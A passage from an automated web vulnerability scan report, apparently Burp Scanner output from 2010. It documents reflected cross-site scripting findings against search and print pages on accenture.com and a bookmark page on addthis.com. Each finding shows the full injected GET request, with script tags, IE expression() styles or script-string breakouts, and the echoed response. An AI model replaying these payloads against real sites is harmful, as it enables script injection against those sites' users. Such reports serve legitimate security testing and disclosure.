Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:33 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67196


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
C822-466D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*211ce"><script>alert(1)</script>d579d659514&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.131. http://www.accenture.com/accenture/search/search.aspx [ie parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the ie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5302b"><script>alert(1)</script>4aa0ca64ae9 was submitted in the ie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf85302b"><script>alert(1)</script>4aa0ca64ae9&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:35 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67196


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf85302b"><script>alert(1)</script>4aa0ca64ae9&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.132. http://www.accenture.com/accenture/search/search.aspx [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41a4d"><script>alert(1)</script>ca532dd932b was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=41a4d"><script>alert(1)</script>ca532dd932b&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:37 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67197


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
ooter=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=41a4d"><script>alert(1)</script>ca532dd932b&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.133. http://www.accenture.com/accenture/search/search.aspx [oe parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the oe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adbc3"><script>alert(1)</script>6f380d9deb9 was submitted in the oe parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8adbc3"><script>alert(1)</script>6f380d9deb9&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:38 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67198


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8adbc3"><script>alert(1)</script>6f380d9deb9&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.134. http://www.accenture.com/accenture/search/search.aspx [output parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the output request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b150"><script>alert(1)</script>a28362fa3c1 was submitted in the output parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd8b150"><script>alert(1)</script>a28362fa3c1&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:35 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67198


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd8b150"><script>alert(1)</script>a28362fa3c1&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.135. http://www.accenture.com/accenture/search/search.aspx [search_in parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the search_in request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a86ff"><script>alert(1)</script>74b31afde1a was submitted in the search_in parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=maina86ff"><script>alert(1)</script>74b31afde1a&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:44 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67198


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=maina86ff"><script>alert(1)</script>74b31afde1a&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.136. http://www.accenture.com/accenture/search/search.aspx [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the site request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 522c2"><script>alert(1)</script>af5239f4278 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations522c2"><script>alert(1)</script>af5239f4278&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:43 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67195


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations522c2"><script>alert(1)</script>af5239f4278&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.137. https://www.accenture.com/accenture/registration/PrintThis.aspx [windowTitle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /accenture/registration/PrintThis.aspx

Issue detail

The value of the windowTitle request parameter is copied into the HTML document as plain text between tags. The payload 931a7<x%20style%3dx%3aexpression(alert(1))>96a5af8d84d44cce5 was submitted in the windowTitle parameter. This input was echoed as 931a7<x style=x:expression(alert(1))>96a5af8d84d44cce5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /accenture/registration/PrintThis.aspx?GUID={13DF5E01-389F-4013-BC36-296A775C1FE5}&footerGuid=9E541954-D5F8-4EC6-AF22-9FF473A55D70&authorContext=PresentationPublished&channelguid={4FDF0FFF-C188-490F-AEA1-A93A6B40D85B}&windowTitle=Submit6a17b</title><x%20style%3dx%3aexpression(alert(1))>1898685ddda931a7<x%20style%3dx%3aexpression(alert(1))>96a5af8d84d44cce5&button=show+response&renderableItem=%2Fshow%2F1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Cookie: Commerce2002_TestPersistentCookie=TestCookie; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; UserPref=Culture^en-US
Host: www.accenture.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 17:15:19 GMT
Connection: keep-alive
Set-Cookie: Commerce2002_TestSessionCookie=TestCookie; path=/
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 17:15:19 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 8297

<title>Submit6a17b</title><x style=x:expression(alert(1))>1898685ddda931a7<x style=x:expression(alert(1))>96a5af8d84d44cce5</title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HT
...[SNIP]...

1.138. https://www.accenture.com/accenture/registration/PrintThis.aspx [windowTitle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /accenture/registration/PrintThis.aspx

Issue detail

The value of the windowTitle request parameter is copied into the HTML document as text between TITLE tags. The payload 6a17b</title><x%20style%3dx%3aexpression(alert(1))>1898685ddda was submitted in the windowTitle parameter. This input was echoed as 6a17b</title><x style=x:expression(alert(1))>1898685ddda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /accenture/registration/PrintThis.aspx?GUID={13DF5E01-389F-4013-BC36-296A775C1FE5}&footerGuid=9E541954-D5F8-4EC6-AF22-9FF473A55D70&authorContext=PresentationPublished&channelguid={4FDF0FFF-C188-490F-AEA1-A93A6B40D85B}&windowTitle=Submit6a17b</title><x%20style%3dx%3aexpression(alert(1))>1898685ddda HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:47:05 GMT
Content-Length: 8127
Connection: close
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:47:05 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache

<title>Submit6a17b</title><x style=x:expression(alert(1))>1898685ddda</title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>PrintThis</title>
       
       <meta
...[SNIP]...

1.139. https://www.accenture.com/accenture/registration/PrintThis.aspx [windowTitle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /accenture/registration/PrintThis.aspx

Issue detail

The value of the windowTitle request parameter is copied into the HTML document as text between TITLE tags. The payload 71140</title><x%20style%3dx%3aexpression(alert(1))>22cfa4275fecd007f was submitted in the windowTitle parameter. This input was echoed as 71140</title><x style=x:expression(alert(1))>22cfa4275fecd007f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /accenture/registration/PrintThis.aspx?GUID={13DF5E01-389F-4013-BC36-296A775C1FE5}&footerGuid=9E541954-D5F8-4EC6-AF22-9FF473A55D70&authorContext=PresentationPublished&channelguid={4FDF0FFF-C188-490F-AEA1-A93A6B40D85B}&windowTitle=71140</title><x%20style%3dx%3aexpression(alert(1))>22cfa4275fecd007f&button=show+response&renderableItem=%2Fshow%2F1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Cookie: Commerce2002_TestPersistentCookie=TestCookie; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; UserPref=Culture^en-US
Host: www.accenture.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 17:15:36 GMT
Connection: keep-alive
Set-Cookie: Commerce2002_TestSessionCookie=TestCookie; path=/
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 17:15:36 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 8183

<title>71140</title><x style=x:expression(alert(1))>22cfa4275fecd007f</title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>PrintThis</title>
       
       <meta
...[SNIP]...

1.140. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51be1"-alert(1)-"86235a760be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php51be1"-alert(1)-"86235a760be HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 21 Nov 2010 17:13:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=5jcqmj343pegjkpgcn6sniqk25; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php51be1"-alert(1)-"86235a760be";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.141. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

